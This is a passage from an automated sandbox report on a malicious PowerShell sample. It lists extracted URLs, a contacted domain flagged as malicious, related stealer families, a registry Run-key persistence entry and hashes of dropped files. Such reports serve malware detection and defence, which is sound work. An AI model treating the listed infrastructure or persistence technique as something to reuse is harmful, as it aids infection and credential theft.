http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo	Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reneelab.com	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1921287558.000001F942B11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bugreports.qt-project.org/	Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.com.cn/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.pl/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reneelab.comwww.reneelab.comhttp://https://0	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctnca.crl0k	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.kr/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.jp/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://xml.org/sax/features/namespaces	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://isecure.reneelab.com.cn/webapi.php?code=	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDll1.2.6	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0/	Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.net/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://qt.digia.com/product/licensing	Set-up.exe, 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://c0rl.m%L	Set-up.exe, 00000008.00000002.2088488029.0000000003744000.00000004.00000020.00020000.00000000.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entityUnknown	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.1921287558.000001F942D39000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	Set-up.exe, 00000003.00000002.1981445677.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003813000.00000004.00000020.00020000.00000000.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entity	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://www.winimage.com/zLibDll	Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false		high
http://www.reneelab.com/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://isecure.reneelab.com/webapi.php?code=	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1921287558.000001F942B11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://trolltech.com/xml/features/report-whitespace-only-CharData	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://downloads.reneelab.com.cn/passnow/passnow_	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.129.193	marchhappen.cyou	United States		13335	CLOUDFLARENETUS	true
172.67.75.40	rentry.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561784
Start date and time:	2024-11-24 10:14:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IaslcsMo.txt.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winPS1@14/221@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 312
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 5944 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: IaslcsMo.txt.ps1

Simulations

Behavior and APIs

Time	Type	Description
04:15:12	API Interceptor	45x Sleep call for process: powershell.exe modified
04:15:42	API Interceptor	8x Sleep call for process: msiexec.exe modified
09:15:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
09:15:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.75.40	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	arc-gym.com.cutestat.com/wp-login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	owuP726k3d.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.75.40
	gkzHdqfg.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40
	Exploit Detector.bat	Get hash	malicious	Unknown	Browse	172.67.75.40
	MilwaukeeRivers.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.26.2.16
	RobCheat.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	172.67.75.40
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.2.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	104.18.167.46
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	104.18.166.46
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.162.84
	santi.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	104.21.47.136
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	104.21.40.167
	file.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	172.67.168.228
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	104.18.167.46
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	104.18.166.46
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.162.84
	santi.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	104.21.47.136
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	104.21.40.167
	file.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	172.67.168.228

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.75.40 172.67.129.193
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC	Browse	172.67.75.40 172.67.129.193
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40 172.67.129.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll	gkzHdqfg.ps1	Get hash	malicious	LummaC Stealer	Browse
	WiFiPrivacyInstallation.exe	Get hash	malicious	Unknown	Browse
	WiFiPrivacyInstallation.exe	Get hash	malicious	Unknown	Browse
	setup.exe	Get hash	malicious	Unknown	Browse
	myp0912.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:NlllulF/lll:NllUF/ll
MD5:	3ECB05F56210644B241FF459B861D309
SHA1:	1A33420F5866C42A5ED3CFF0DD505451FBFA8072
SHA-256:	712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
SHA-512:	79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^.........................

C:\Users\user\AppData\Local\Temp\596c5d08

Download File

Process:	C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	1045367
Entropy (8bit):	7.579168780143814
Encrypted:	false
SSDEEP:	24576:GeHbKKorOvSblFGnKY9nachNLs71XOx7n53sGhtlx4/:GeHbLA1c07VOxnKGhLo
MD5:	D4A660E3833F77B460B23B05D6C41F57
SHA1:	E08D276F3BD03A49BE42FEF59EB25B489BCBDC2E
SHA-256:	B6473A8A08AC36349F1805654994256B35E676245B1866DEE0619050396369D5
SHA-512:	269FC604CC796814DFB815A5C312B0262B518D7AD02B82539016C74A058952FE07D4A8E7AD0297A22702B46B4DC8771023C8AAD2D2DE1503D8AA97DC91DABC2C
Malicious:	false
Preview:	..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..{F.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF

C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	HTML document, ASCII text, with very long lines (8771), with no line terminators
Category:	dropped
Size (bytes):	8771
Entropy (8bit):	6.166951756734964
Encrypted:	false
SSDEEP:	192:PN2x2BUIVtP3ix0tV0PbF/Is2/KhIWc02G4fZXOlIySN:Ax56tobFv2/y/4fZXo6N
MD5:	43D5F32F2A6DF447CFB144940520C557
SHA1:	9E70A455111694020C31A70C4C07764D7DE070D4
SHA-256:	B763F9CD64855595CBDEB2EE5BA772692C17B42CB52CD27367665B30EAC1F917
SHA-512:	0F5BCA8AA59DBC22046AB56E8ED3B4B72746F3CAAEDCBABED1AED25177E6E6BBF3D663B8AC118340CA5EF5EA9D85EDEB53FB8E61978DE4E905E9A27147160928
Malicious:	true
Preview:	<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcb0yw4p.msi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
